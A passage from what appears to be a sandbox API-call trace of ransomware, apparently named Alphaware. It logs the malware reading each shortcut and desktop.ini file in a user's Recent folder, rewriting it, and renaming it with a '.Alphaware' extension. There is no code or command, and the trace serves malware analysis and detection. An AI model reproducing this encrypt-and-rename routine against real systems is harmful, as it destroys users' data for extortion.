hTemplateFile=0x0) returned 0x250 [0095.993] ReadFile (in: hFile=0x250, lpBuffer=0x25db720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25db720*, lpNumberOfBytesRead=0x23e958*=0x99d, lpOverlapped=0x0) returned 1 [0096.017] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CH482b9Cr-K.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ch482b9cr-k.ots.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.019] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CH482b9Cr-K.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ch482b9cr-k.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16f0940, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16f0940, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b6d0f00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xda0)) returned 1 [0096.019] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CH482b9Cr-K.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ch482b9cr-k.ots.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CH482b9Cr-K.ots.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ch482b9cr-k.ots.lnk.alphaware")) returned 1 [0096.020] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CKk3Lv0r a.lnk", dwFileAttributes=0x80) returned 1 [0096.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CKk3Lv0r a.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ckk3lv0r a.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2460828 | out: lpFileInformation=0x2460828*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0562700, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0562700, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0562700, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9a2)) returned 1 [0096.021] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CKk3Lv0r a.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ckk3lv0r a.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.021] ReadFile (in: hFile=0x250, lpBuffer=0x24614a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24614a0*, lpNumberOfBytesRead=0x23e958*=0x9a2, lpOverlapped=0x0) returned 1 [0096.049] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CKk3Lv0r a.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ckk3lv0r a.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.054] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CKk3Lv0r a.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ckk3lv0r a.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0562700, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0562700, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b743320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdb4)) returned 1 [0096.054] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CKk3Lv0r a.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ckk3lv0r a.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CKk3Lv0r a.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ckk3lv0r a.lnk.alphaware")) returned 1 [0096.056] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Common Files.lnk", dwFileAttributes=0x80) returned 1 [0096.056] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Common Files.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\common files.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24e6cb0 | out: lpFileInformation=0x24e6cb0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0301100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd173cc00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd173cc00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2a1)) returned 1 [0096.056] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Common Files.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\common files.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.056] ReadFile (in: hFile=0x250, lpBuffer=0x24e7248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24e7248*, lpNumberOfBytesRead=0x23e958*=0x2a1, lpOverlapped=0x0) returned 1 [0096.077] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Common Files.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\common files.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.129] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Common Files.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\common files.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0301100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd173cc00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b78f5e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x460)) returned 1 [0096.129] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Common Files.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\common files.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Common Files.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\common files.lnk.alphaware")) returned 1 [0096.131] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini", dwFileAttributes=0x80) returned 1 [0096.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2568338 | out: lpFileInformation=0x2568338*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e827b60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1b0)) returned 1 [0096.131] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.131] ReadFile (in: hFile=0x250, lpBuffer=0x2568798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2568798*, lpNumberOfBytesRead=0x23e958*=0x1b0, lpOverlapped=0x0) returned 1 [0096.153] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.155] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8b827b60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x320)) returned 1 [0096.155] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\desktop.ini.alphaware")) returned 1 [0096.156] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dFW79KlkBOtau4aDuO.lnk", dwFileAttributes=0x80) returned 1 [0096.157] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dFW79KlkBOtau4aDuO.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dfw79klkbotau4aduo.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25e8678 | out: lpFileInformation=0x25e8678*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfaf86c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfaf86c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfaf86c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf47)) returned 1 [0096.157] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dFW79KlkBOtau4aDuO.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dfw79klkbotau4aduo.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.157] ReadFile (in: hFile=0x250, lpBuffer=0x25e98d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25e98d0*, lpNumberOfBytesRead=0x23e958*=0xf47, lpOverlapped=0x0) returned 1 [0096.180] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dFW79KlkBOtau4aDuO.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dfw79klkbotau4aduo.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.183] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dFW79KlkBOtau4aDuO.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dfw79klkbotau4aduo.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfaf86c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfaf86c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b84dcc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1534)) returned 1 [0096.188] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dFW79KlkBOtau4aDuO.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dfw79klkbotau4aduo.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dFW79KlkBOtau4aDuO.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dfw79klkbotau4aduo.lnk.alphaware")) returned 1 [0096.189] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DITJBeUAzHRJy.ots.lnk", dwFileAttributes=0x80) returned 1 [0096.190] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DITJBeUAzHRJy.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ditjbeuazhrjy.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2472a50 | out: lpFileInformation=0x2472a50*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0a715c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a715c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a715c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9b3)) returned 1 [0096.190] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DITJBeUAzHRJy.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ditjbeuazhrjy.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.190] ReadFile (in: hFile=0x250, lpBuffer=0x2473718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2473718*, lpNumberOfBytesRead=0x23e958*=0x9b3, lpOverlapped=0x0) returned 1 [0096.220] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DITJBeUAzHRJy.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ditjbeuazhrjy.ots.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.222] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DITJBeUAzHRJy.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ditjbeuazhrjy.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a715c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a715c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b8c00e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdc8)) returned 1 [0096.222] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DITJBeUAzHRJy.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ditjbeuazhrjy.ots.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DITJBeUAzHRJy.ots.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ditjbeuazhrjy.ots.lnk.alphaware")) returned 1 [0096.224] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DMtfYZ.lnk", dwFileAttributes=0x80) returned 1 [0096.224] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DMtfYZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dmtfyz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24f9010 | out: lpFileInformation=0x24f9010*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd135e840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd135e840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd135e840, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1321)) returned 1 [0096.224] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DMtfYZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dmtfyz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.224] ReadFile (in: hFile=0x250, lpBuffer=0x24f9290, nNumberOfBytesToRead=0x1321, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24f9290*, lpNumberOfBytesRead=0x23e958*=0x1321, lpOverlapped=0x0) returned 1 [0096.245] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DMtfYZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dmtfyz.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.253] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DMtfYZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dmtfyz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd135e840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd135e840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b90c3a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a60)) returned 1 [0096.253] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DMtfYZ.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dmtfyz.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DMtfYZ.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dmtfyz.lnk.alphaware")) returned 1 [0096.254] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dNMC XdC2fS1.lnk", dwFileAttributes=0x80) returned 1 [0096.255] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dNMC XdC2fS1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dnmc xdc2fs1.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2584938 | out: lpFileInformation=0x2584938*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf8e3380, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf8e3380, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf8e3380, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9d4)) returned 1 [0096.255] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dNMC XdC2fS1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dnmc xdc2fs1.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.255] ReadFile (in: hFile=0x250, lpBuffer=0x2585600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2585600*, lpNumberOfBytesRead=0x23e958*=0x9d4, lpOverlapped=0x0) returned 1 [0096.279] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dNMC XdC2fS1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dnmc xdc2fs1.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.281] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dNMC XdC2fS1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dnmc xdc2fs1.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf8e3380, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf8e3380, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b958660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4)) returned 1 [0096.281] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dNMC XdC2fS1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dnmc xdc2fs1.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dNMC XdC2fS1.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\dnmc xdc2fs1.lnk.alphaware")) returned 1 [0096.283] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Duc5tpM3PDmAXr1.ots.lnk", dwFileAttributes=0x80) returned 1 [0096.283] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Duc5tpM3PDmAXr1.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\duc5tpm3pdmaxr1.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x240a3a8 | out: lpFileInformation=0x240a3a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ba20c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ba20c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0bc8220, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe02)) returned 1 [0096.283] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Duc5tpM3PDmAXr1.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\duc5tpm3pdmaxr1.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.283] ReadFile (in: hFile=0x250, lpBuffer=0x240b4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x240b4c0*, lpNumberOfBytesRead=0x23e958*=0xe02, lpOverlapped=0x0) returned 1 [0096.307] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Duc5tpM3PDmAXr1.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\duc5tpm3pdmaxr1.ots.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.309] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Duc5tpM3PDmAXr1.ots.lnk" (normalized: 